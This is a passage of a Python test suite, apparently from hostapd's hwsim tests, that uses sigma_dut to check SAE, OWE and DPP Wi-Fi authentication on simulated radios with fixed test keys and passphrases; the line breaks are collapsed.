sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") 
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C', ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '19': raise Exception("Expected default SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_sae_group(dev, apdev, params): """sigma_dut controlled AP with SAE and specific group""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_sae_group.sigma-hostapd") if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", ieee80211w="2", scan_freq="2412") if dev[0].get_status_field('sae_group') != '20': raise Exception("Expected SAE group not used") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_psk_sae(dev, apdev, params): """sigma_dut controlled AP with PSK+SAE""" if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") logdir = os.path.join(params['logdir'], "sigma_dut_ap_psk_sae.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[2].request("SET sae_groups ") dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678", scan_freq="2412", ieee80211w="0", wait_connect=False) dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", scan_freq="2412", ieee80211w="2") dev[1].connect("test-sae", psk="12345678", scan_freq="2412") ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) dev[2].request("DISCONNECT") if ev is not None: raise Exception("Unexpected connection without PMF") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_owe(dev, apdev): """sigma_dut controlled OWE station""" try: run_sigma_dut_owe(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_owe(dev, apdev): if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) try: params = {"ssid": "owe", "wpa": "2", "wpa_key_mgmt": "OWE", "ieee80211w": "2", "rsn_pairwise": "CCMP"} hapd = hostapd.add_ap(apdev[0], params) bssid = hapd.own_addr() sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) dev[0].dump_monitor() sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid)) dev[0].wait_connected() sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].wait_disconnected() dev[0].dump_monitor() 
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].wait_disconnected() dev[0].dump_monitor() sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) if ev is None: raise Exception("Association not rejected") if "status_code=77" not in ev: raise Exception("Unexpected rejection reason: " + ev) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe(dev, apdev, params): """sigma_dut controlled AP with OWE""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_owe.sigma-hostapd") if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_ecgroupid(dev, apdev): """sigma_dut controlled AP with OWE and ECGroupID""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="20", scan_freq="2412") dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected() dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="21", scan_freq="2412") dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected() dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="19", scan_freq="2412", wait_connect=False) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10) dev[0].request("DISCONNECT") if ev is None: raise Exception("Association not rejected") if "status_code=77" not in ev: raise Exception("Unexpected rejection reason: " + ev) dev[0].dump_monitor() sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params): """sigma_dut controlled AP with OWE and transition mode""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") logdir = os.path.join(params['logdir'], 
"sigma_dut_ap_owe_transition_mode.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G") res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412") if dev[0].get_status_field('bssid') not in res1: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1) if dev[1].get_status_field('bssid') not in res2: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params): """sigma_dut controlled AP with OWE and transition mode (2)""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") logdir = os.path.join(params['logdir'], "sigma_dut_ap_owe_transition_mode_2.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G") res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412") if dev[0].get_status_field('bssid') not in res2: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res1) if dev[1].get_status_field('bssid') not in res1: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res2) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def dpp_init_enrollee(dev, id1): logger.info("Starting DPP initiator/enrollee in a thread") time.sleep(1) cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1 if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Enrollee)") logger.info("DPP initiator/enrollee done") def test_sigma_dut_dpp_qr_resp_1(dev, apdev): """sigma_dut DPP/QR responder (conf index 1)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 1) def test_sigma_dut_dpp_qr_resp_2(dev, apdev): """sigma_dut DPP/QR responder (conf index 2)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 2) def test_sigma_dut_dpp_qr_resp_3(dev, apdev): """sigma_dut DPP/QR responder (conf index 3)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 3) def test_sigma_dut_dpp_qr_resp_4(dev, apdev): """sigma_dut DPP/QR responder (conf index 4)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 4) def 
test_sigma_dut_dpp_qr_resp_5(dev, apdev): """sigma_dut DPP/QR responder (conf index 5)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 5) def test_sigma_dut_dpp_qr_resp_6(dev, apdev): """sigma_dut DPP/QR responder (conf index 6)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 6) def test_sigma_dut_dpp_qr_resp_7(dev, apdev): """sigma_dut DPP/QR responder (conf index 7)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 7) def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev): """sigma_dut DPP/QR responder (channel list override)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1', listen_chan=2) def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None, listen_chan=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR" if chan_list: cmd += ",DPPChannelList," + chan_list res = sigma_dut_cmd(cmd) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,%d,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % conf_idx if listen_chan: cmd += ",DPPListenChannel," + str(listen_chan) res = sigma_dut_cmd(cmd, timeout=10) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add 
configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee""" run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev) def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)""" run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra="DPPAuthDirection,Mutual,") def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra=''): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator qr=mutual" if "OK" not 
in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra, timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None): time.sleep(1) logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, to_hex("DPPNET01"), conf_id) if own_id is not None: cmd += " own=%d" % own_id if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) responder as Enrollee""" run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev) def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev): """sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)""" run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1') def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise 
HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_init_conf_mutual, args=(dev[1], id1, conf_id, id0)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes" if extra: cmd += extra res = sigma_dut_cmd(cmd, timeout=25) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def dpp_resp_conf_mutual(dev, conf_id, uri): logger.info("Starting DPP responder/configurator in a thread") dev.set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator qr=mutual" if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP listen") if uri: ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10) if ev is None: raise Exception("QR Code scan for mutual authentication not requested") dev.dpp_qr_code(uri) ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP responder/configurator done") def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee""" run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False) def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)""" run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True) def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = 
"eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = 